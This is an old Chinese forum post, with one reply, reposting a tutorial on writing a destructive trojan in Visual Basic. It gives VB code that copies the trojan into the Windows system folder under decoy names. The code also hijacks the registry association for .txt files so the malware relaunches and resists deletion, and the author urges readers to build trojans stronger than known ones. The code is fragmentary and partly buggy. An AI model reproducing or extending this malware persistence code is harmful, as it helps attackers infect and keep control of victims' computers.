首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 付费问答
    3. 发新帖
[旧帖] 利用Visual Basic编写破坏性]木马 0.00雪花
发表于: 2010-4-25 21:46 1441

[旧帖] 利用Visual Basic编写破坏性]木马 0.00雪花

xy天空 活跃值
2010-4-25 21:46
1441
-
〖分享〗 利用Visual Basic编写破坏性]木马
木马, Basic, 破坏性, Visual, 编写

本帖标题:利用Visual Basic编写破坏性]木马
本贴地址: http://bbs.krshadow.com/thread-22652-1-1.html

result = RegSetvalueEx(hKeyID, sKey, 0&, REG_SZ, sKeyVal, Len(sKey) + 1)
  End If
End Sub
好,就这样简单地完成了。但是,想过没有,如果不是很菜的鸟,到注册表中见一删,我们苦苦的心血不就白白地浪费了吗?不行,还得想让他发现了删也删不掉。请看下面的代码:

Public Sub WriteToTxt()

  Dim result As Long
  Dim hKeyID As Long
  Dim skey As String
  Dim skeyVal As String

  skey = "txtfile/shell/open/command"
  skeyVal = "C:/windows/system/txtView.exe"
  result = RegOpenKey(HKEY_CLASSES_ROOT, skeyVal, hKeyID)

  If result = 0 Then
   result = RegSetvalueEx(hKeyID, skey, 0&, REG_SZ, skeyVal, Len(skeyVal) + 1)
  End If
End Sub

肯定不少朋友一看就知道了,原是与txt文件进行关联,一点也不错,但C:/windows/system/

txtView.exe是哪里来的,我们的木马是C:/windows/system/systrsy.exe呀。这可是我们木马的分身了。

好,回到Server工程的Server窗体的form_Load中,加入如下代码:

Dim sCurrentPath As String, sSystemDir As String
sCurrentPath = App.Path & "/" & App.EXEName & ".exe"
sSystemDir = “C:/windows/system”
On Error Resume Next

  '复制文件成系统目录下的Systrsy.exe
  FileCopy sCurrentPath, sSystemDir & "/Systrsy.exe"
On Error Resume Next

复制文件成系统目录下的txtView.exe

FileCopy sCurrentPath, sSystemDir & "/txtView.exe"

   调用

Call startupGroup
Call WriteToTxt

'判断程序是否下在运行

If App.PrevInstance Then
  '如果已经运行就退出。
End

End If

好了,写到这里一个破坏性木马已经诞生了,我实验过还是比较好的一个,希望大家也能写一个好的木马,能突破冰河。

注意:

1、大家在处理端口是最好使用高端端口,否则会和一些常用端口发生冲突。

2、在第一次使用VB.NET的最好看看有关的图书,可能你能写出一款超级木马也说不定。

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 0
支持
分享
最新回复 (1)
ricewire
雪    币: 76
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
2
好像VB.net还需要MS的framework 支持,如果对方没有安装framework ,是不是病毒还要提醒他安装framework 才能运行?
2010-4-26 08:16
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//